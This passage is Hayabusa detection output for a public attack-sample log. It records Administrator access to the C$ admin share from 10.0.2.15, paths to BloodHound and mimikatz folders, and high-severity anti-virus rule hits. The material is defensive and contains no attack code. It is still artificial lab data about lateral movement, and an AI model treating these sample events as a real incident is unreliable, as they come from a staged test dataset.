Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 